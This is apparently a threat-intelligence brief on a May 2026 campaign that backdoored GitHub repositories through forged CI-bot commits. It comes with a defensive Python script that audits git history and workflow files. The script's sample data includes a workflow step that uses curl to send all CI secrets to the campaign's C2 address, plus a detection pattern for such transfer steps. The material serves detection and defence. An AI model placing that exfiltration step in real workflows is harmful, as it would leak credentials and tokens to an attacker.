DMZ//THREAT INTEL
CRITICAL | #supply chain

Operation Megalodon: Automated Campaign Backdoors 5,561 GitHub Repos via Forged CI Commits in Six Hours, 449 GB Exfiltrated

Between 11:36 and 17:48 UTC on May 18, 2026, a campaign tracked as Megalodon (attributed to the TeamPCP syndicate) pushed 5,718 malicious commits to 5,561 GitHub repositories. The commits came from throwaway accounts under forged author identities that mimic routine CI bots (build-bot, auto-ci, ci-bot, pipeline-bot). Two payload variants were deployed: a mass variant that fires on every push and pull request, and a dormant backdoor variant (Optimize-Build) that stays inert until it is activated on demand through the GitHub API. Both exfiltrate cloud credentials, SSH keys, OIDC tokens, and CI secrets to a C2 at 216.126.225.129:8443. As of May 21 the attacker's ingest server showed 575,352 stolen files and 449 GB of exfiltrated data, with the total still growing.

Organizations should immediately audit their .github/workflows/ directories for unauthorized commits, starting with the author addresses build-system@noreply.dev and ci-bot@automated.dev, and rotate every secret reachable from affected runners. Two caveats apply. First, because the author identities are forged, the listed addresses are a starting point rather than a complete filter; any commit to a workflow file by an unrecognized identity inside the campaign window deserves review. Second, because the dormant variant does not execute until triggered, the absence of workflow runs is not evidence that a repository is clean; the check must be made against the committed workflow files, not only against run history. Block and hunt for outbound connections to 216.126.225.129:8443 from CI egress.
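As an added, illustrative example (not part of this brief and not DMZ tooling), the following Python script audits a repository for the pattern described above. It assumes the history was exported from the repository root with `git log --format='%H|%an|%ae|%aI' --name-only` and that the current workflow files are read into a dictionary keyed by path; the author addresses, bot names, and C2 endpoint are the indicators quoted in the brief, while the sample log and workflow contents are constructed for the demonstration and describe no real repository.

```python
"""Audit git history and workflow files for the Megalodon forged-CI-commit
pattern: CI-bot-looking identities touching .github/workflows/ and workflow
steps that ship secrets to the campaign's C2 endpoint."""
import re
from dataclasses import dataclass, field

# Indicators quoted from the brief.
IOC_AUTHOR_EMAILS = {"build-system@noreply.dev", "ci-bot@automated.dev"}
IOC_BOT_NAMES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
IOC_C2_HOST = "216.126.225.129"
WORKFLOW_DIR = ".github/workflows/"


@dataclass
class Commit:
    sha: str
    author_name: str
    author_email: str
    date: str
    files: list = field(default_factory=list)


def parse_git_log(text):
    """Parse output of (assumed invocation, run from the repo root):
         git log --format='%H|%an|%ae|%aI' --name-only
    Each commit is a header line followed by the paths it touched."""
    commits, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split("|", 3)
        if len(parts) == 4 and re.fullmatch(r"[0-9a-f]{7,40}", parts[0]):
            current = Commit(*parts)
            commits.append(current)
        elif current is not None:
            current.files.append(line)
    return commits


def flag_commit(commit):
    """Return reasons this commit matches the campaign pattern, or [] if clean.
    Only commits that touch workflow files are considered."""
    if not any(f.startswith(WORKFLOW_DIR) for f in commit.files):
        return []
    reasons = []
    if commit.author_email.lower() in IOC_AUTHOR_EMAILS:
        reasons.append(f"author email {commit.author_email} is a brief IOC")
    if commit.author_name.lower() in IOC_BOT_NAMES:
        reasons.append(f"author name '{commit.author_name}' mimics a CI bot")
    return reasons


def flag_workflow(path, content):
    """Return reasons a committed workflow looks backdoored, or [].
    The second check is a triage heuristic: an outbound transfer tool in a
    step that also reads the secrets context."""
    reasons = []
    if IOC_C2_HOST in content:
        reasons.append(f"{path}: references C2 host {IOC_C2_HOST}")
    if (re.search(r"\b(curl|wget|Invoke-WebRequest)\b", content)
            and re.search(r"\$\{\{[^}]*\bsecrets\b", content)):
        reasons.append(path + ": outbound transfer step that reads the secrets context")
    return reasons


def audit(log_text, workflows):
    """workflows: {path: content} for files currently under .github/workflows/.
    Returns a list of (commit-sha-or-'worktree', reason) findings."""
    findings = []
    for c in parse_git_log(log_text):
        for r in flag_commit(c):
            findings.append((c.sha[:12], r))
    for path, content in workflows.items():
        for r in flag_workflow(path, content):
            findings.append(("worktree", r))
    return findings


# Constructed sample data for the demonstration (not real repository history).
SAMPLE_LOG = """\
a1b2c3d4e5f60718293a4b5c6d7e8f9012345678|Jane Dev|jane@example.com|2026-05-18T09:12:00+00:00

src/app.py

0f9e8d7c6b5a49382716f5e4d3c2b1a098765432|ci-bot|ci-bot@automated.dev|2026-05-18T12:04:31+00:00

.github/workflows/optimize-build.yml

ffeeddccbbaa99887766554433221100aabbccdd|dependabot[bot]|49699333+dependabot[bot]@users.noreply.github.com|2026-05-17T02:00:00+00:00

.github/workflows/ci.yml

123456789abcdef0123456789abcdef012345678|Build-Bot|builds@example.com|2026-05-18T15:41:07+00:00

.github/workflows/release.yml
"""

SAMPLE_WORKFLOWS = {
    ".github/workflows/ci.yml":
        "name: CI\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - run: pytest\n",
    ".github/workflows/optimize-build.yml":
        "name: Optimize-Build\non: [push, pull_request]\njobs:\n  build:\n"
        "    runs-on: ubuntu-latest\n    steps:\n"
        "      - run: curl -sk https://216.126.225.129:8443/i -d \"$SECRETS\"\n"
        "        env:\n          SECRETS: ${{ toJson(secrets) }}\n",
}

if __name__ == "__main__":
    for sha, reason in audit(SAMPLE_LOG, SAMPLE_WORKFLOWS):
        print(f"[{sha}] {reason}")
```

In the constructed sample the dependabot commit to a workflow is not flagged and the developer commit outside .github/workflows/ is ignored, while the `ci-bot` commit matches on both address and name and the `Build-Bot` commit matches on name only, which is the case the forged-identity caveat is about: an attacker who changes the address still has to look like a bot to blend in. Pair the name and address matches with the pushing identity recorded in the organization's audit log, since that is the one field the forged author header cannot rewrite.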

This intelligence brief has been compiled from open-source reporting and corroborated across multiple threat intelligence sources. Defenders should treat the critical severity rating as a guide to prioritization within their environment.
